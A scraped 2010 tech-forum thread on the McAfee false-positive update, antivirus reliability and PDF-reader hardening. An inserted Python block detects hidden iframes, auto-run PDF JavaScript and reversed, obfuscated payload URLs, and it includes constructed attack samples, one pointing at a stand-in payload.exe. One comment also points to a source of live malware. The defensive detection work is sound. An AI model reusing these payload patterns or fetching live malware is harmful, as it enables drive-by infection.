A programmer buddy of mine who works at Kayako and now some web-based firm had a virtual machine infected, and he uses nothing but Chrome across the board. No prompts, just loaded a page with an advert and *BLAM* fake anti-virus pop-ups everywhere. Nothing that a roll-back can't cure, but it is possible and I'm not too surprised.

Open Adobe Reader RIGHT NOW and hit Edit -> Preferences. Under Internet, uncheck Display PDF in browser. Under Javascript, uncheck Enable Adobe Javascript. Congratulations, you are now much, much more secure than you were a minute ago. To go another step further, install Secunia PSI and scan your system occasionally; install any patches as needed.

I've seen every trick in the book: javascript functions that take in obfuscated text BACKWARDS to parse it into a URL, to hide the URL from AV / HIPS scanners. As soon as AV companies start to detect this kind of thing, the malware groups just add another layer. The rabbit hole goes deeper and deeper. There was one page that had functions written in ten different languages. ;)

malwaredomainlist is a great place for people to get their hands on this kind of code in the wild and experiment with it. Remember to lock your VM down if you do! I would even recommend running the Windows VM in a Linux host, just for absolute safety.

Edited 2010-04-24 17:46 UTC

Reply Score: 1
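The detection ideas in the two comments above (flagging odd iframes, scanning PDFs for risky tags, and spotting script strings that only become a URL once reversed) can be sketched as simple static checks. This is an added example, not code from the thread or from any AV vendor; the sample HTML, PDF fragment and script are constructed, and the regexes are deliberately loose heuristics, not a full parser.

```python
import re

# Constructed samples (not from the thread): a hidden 1x1 iframe pulling a PDF,
# a PDF whose catalog auto-runs JavaScript, and a script that stores its
# download URL reversed so a plain string scan never sees "http://".
SAMPLE_HTML = ('<p>news</p><iframe src="http://cdn.example.test/x.pdf" '
               'width="1" height="1" style="visibility:hidden"></iframe>')
SAMPLE_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
              b"2 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj\n")
SAMPLE_JS = ('var u = "exe.daolyap/tset.elpmaxe.dab//:ptth".split("")'
             '.reverse().join(""); load(u);')

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)')
PDF_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch")
STRING_RE = re.compile(r'["\']([^"\']{12,})["\']')
URL_RE = re.compile(r"https?://|\.exe\b", re.I)


def suspicious_iframes(html):
    """Flag iframes that are hidden, tiny, or that load a PDF/SWF."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        style = attrs.get("style", "").lower().replace(" ", "")
        reasons = []
        if re.search(r"\.(pdf|swf)(\?|$)", attrs.get("src", ""), re.I):
            reasons.append("loads pdf/swf")
        if attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1"):
            reasons.append("tiny frame")
        if "hidden" in style or "display:none" in style:
            reasons.append("hidden")
        if reasons:
            findings.append((attrs.get("src", ""), reasons))
    return findings


def risky_pdf_names(data):
    """Return PDF name objects that enable script or auto-run actions."""
    return [n.decode() for n in PDF_NAMES
            if re.search(re.escape(n) + rb"(?![A-Za-z])", data)]


def reversed_url_strings(js):
    """Return string literals that only look like a URL once reversed."""
    hits = []
    for m in STRING_RE.finditer(js):
        s = m.group(1)
        if not URL_RE.search(s) and URL_RE.search(s[::-1]):
            hits.append(s[::-1])
    return hits
```

Each function returns what it flagged, so the checks can be chained into a content filter at the proxy or in a HIPS agent; a real deployment would decode PDF object streams and handle other encodings before applying the name check.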

RE[3]: State of AV today
by nt_jerkface on Sat 24th Apr 2010 19:30 UTC in reply to "RE[2]: State of AV today"
nt_jerkface Member since:
2009-08-26

A programmer buddy of mine who works at Kayako and now some web-based firm had a virtual machine infected, and he uses nothing but Chrome across the board.


I can also provide a browser security anecdote:
http://arstechnica.com/security/news/2009/03/chrome-is-the-only-bro...

Disabling Javascript in Adobe Reader is good advice but I would go a step further and suggest an alternative like Foxit. Java should only be installed if absolutely needed. It's such a shame that so many websites still use Java when there are better alternatives.
http://krebsonsecurity.com/2010/04/unpatched-java-exploit-spotted-i...

Reply Score: 2

RE[4]: State of AV today
by moondino on Sat 24th Apr 2010 21:52 UTC in reply to "RE[3]: State of AV today"
moondino Member since:
2010-03-27

A quote from that link:

"the contestants are required to do this in default browser installations without plugins such as Flash or Java, which are commonly used as vectors for attacks."

So basically, not a real world situation.

Every product has security flaws... the security software / anti-virus needs to look at the choke points and protect those, instead of stupid hash detection or proactive detection that hits almost as many false positives as it does legit malware. Choke points being, the registry keys that have to be changed for a program to survive a reboot, the installation of a device driver or service, etc.

In a business environment, tell me how we are going to move thousands of users who are accustomed to Adobe Acrobat / Reader to FoxIt without training or extensive documentation, re-training of the Help Desk, etc.

To boot, FoxIt has its own slew of security issues. There are PDFs out there that buffer overflow FoxIt as well, just scan Secunia or disclosure sites for a few examples. Security via obscurity doesn't work in an age of targeted attacks.

I'm not trying to toot my own horn, but I used to work for a major AV security company and I'm only putting this kind of thing out there to help people be better protected. Google Chrome does have the ability to control javascript execution per site now, but you have to whitelist them manually, which is a huge pain. If you could simply right click the address bar and then choose allow top-level site, it would be manageable and I would switch from Firefox / NoScript almost immediately. With the current model, however, Firefox is easier to manage, although quite a bit slower. ;)

Edited 2010-04-24 21:59 UTC

Reply Score: 1

RE[5]: State of AV today
by WereCatf on Sun 25th Apr 2010 10:38 UTC in reply to "RE[4]: State of AV today"
WereCatf Member since:
2006-02-15

In a business environment, tell me how we are going to move thousands of users who are accustomed to Adobe Acrobat / Reader to FoxIt without training or extensive documentation, re-training of the Help Desk, etc.

In a business environment Acrobat/Acrobat Reader is the de-facto standard and it's probably really tough to try to get people to move on to something else.

But for home users I often suggest SumatraPDF. It's pretty snappy, small, and doesn't seem to suffer from the same vulnerabilities as Foxit or Acrobat, at least not when I've tried it in a VM with an infected file. It lacks some of the capabilities of its bigger brothers, though, but it could very well be worth the small effort of trying if you know someone who only needs to read PDF files, not edit them ;)

Reply Score: 2

RE[6]: State of AV today
by darknexus on Sun 25th Apr 2010 12:46 UTC in reply to "RE[5]: State of AV today"
darknexus Member since:
2008-07-15

This is probably a dumb question, but what's to retrain in operating a PDF viewer? Go to page x, read, next page, read, fill out form, print/send... etc. I can understand maybe needing to retrain if you were to switch word processors or something, but a document viewer?

Reply Score: 2

RE[6]: State of AV today
by nt_jerkface on Mon 26th Apr 2010 01:54 UTC in reply to "RE[5]: State of AV today"
nt_jerkface Member since:
2009-08-26

But for home users I often suggest SumatraPDF. It's pretty snappy, small, and doesn't seem to suffer from the same vulnerabilities as Foxit or Acrobat


I think the problem with Sumatra is that it is too light, as in missing too many features even for home users. It's like the notepad of pdf readers. As soon as they want to do something beyond reading the file they will just go and install Adobe reader. I really can't recommend it for that reason.

Reply Score: 2

RE[5]: State of AV today
by nt_jerkface on Mon 26th Apr 2010 01:36 UTC in reply to "RE[4]: State of AV today"
nt_jerkface Member since:
2009-08-26


In a business environment, tell me how we are going to move thousands of users who are accustomed to Adobe Acrobat / Reader to FoxIt without training or extensive documentation, re-training of the Help Desk, etc.


That's a fair concern for changing office suites but a pdf reader? It's not like you can do that much with a pdf.


To boot, FoxIt has it's own slew of security issues. There are PDFs out there that buffer overflow FoxIt as well,


The vast majority of pdf exploits only work with Adobe reader. It's not that I believe FoxIt to be 100% unhackable, it's more Adobe's abysmal security record.
http://www.computerworld.com/s/article/9157438/Rogue_PDFs_account_f...


Security via obscurity doesn't work in an age of targeted attacks.


Yes it does because those attacks are often targeted at the largest targets. It just shouldn't be relied upon as a sole method of defense.

With the current model, however, Firefox is easier to manage, although quite a bit slower. ;)


I've never trusted the Mozilla code base and I think their security record in the past was more due to IE6 being an easy target. Last year Firefox had far more vulnerabilities than IE8.

Despite being the most attacked browser, IE had 45 reported vulnerabilities, compared with 169 vulnerabilities reported for Firefox.

http://news.cnet.com/8301-27080_3-20002879-245.html

Reply Score: 2

Comment by ballmerlikesgoogle
by ballmerlikesgoogle on Sat 24th Apr 2010 03:38 UTC
ballmerlikesgoogle
Member since:
2009-10-23

Thank God we ditched McAfee 3 years ago, I would be pulling my hair out right about now with every user in my corp banging down my door.

I am stuck using Windows at work, for us to change to another platform such as Linux or Mac is not an option due to our software vendors. Fortunately I have one AV vendor defending my desktops and servers, and 3 other AV vendors sitting in the UTM on the perimeter, very rare we ever get anything through.

There will always be false positives in AV, but how McAfee slipped up on this one I can't even begin to imagine.

Whoever was doing the QA on that DAT needs to be shown the door, maybe he can hang with the bum who worked for Apple who left the iPhone prototype in the bar because he got a little too blitzed. (They can both be scrubbing Steve Jobs's porcelain IGod....)

Reply Score: 2

RE: Comment by ballmerlikesgoogle
by funny_irony on Sat 24th Apr 2010 08:43 UTC in reply to "Comment by ballmerlikesgoogle"
funny_irony Member since:
2007-03-07

False positives are nothing new. Symantec AV crashed thousands of PCs in China in 2007 with the blue screen of death.

http://www.computerworld.com/s/article/9019958/Symantec_false_posit...

http://texyt.com/symantec+china+compensates+antivirus+victims+angry...

Symantec also caused hundreds of PCs in my company to crash with a blue screen in 2008 when one of its live update virus definitions was corrupted.


Symantec and McAfee outsource their programming to cheap labour in India. When you pay peanuts, you get monkeys. If you expect quality, look elsewhere ;)

Edited 2010-04-24 08:48 UTC

Reply Score: 1

AVG is having a laugh right about now
by bousozoku on Sat 24th Apr 2010 15:27 UTC
bousozoku
Member since:
2006-01-23

Remember AVG Anti-Virus attacking a Windows (Vista?) system file and so many people were upset?

I can't imagine that McAfee are feeling any better, though they don't have a huge number of free users, though they have those free trials.

Reply Score: 2

hollovoid Member since:
2005-09-21

Actually home users were spared from the beating, it hit corporate customers and was caught before everybody else got hit. Which in some ways is kind of worse, because there is a much bigger sting to a whole company's worth of computers going down, than a bunch of random home computers.

Reply Score: 2

darknexus Member since:
2008-07-15

Didn't AVG also only hit one language of Windows? I think it was the German version wasn't it? And I don't believe AVG brought down any vital systems in German-speaking locales either, though this is probably because most corporate users don't use AVG of any kind.
Norton and McAfee, the real viruses. Those two most common have to be the worst virus protection in existence.

Reply Score: 2

hollovoid Member since:
2005-09-21

Norton and McAfee, the real viruses. Those two most common have to be the worst virus protection in existence.

This is very goddamn true.

Reply Score: 2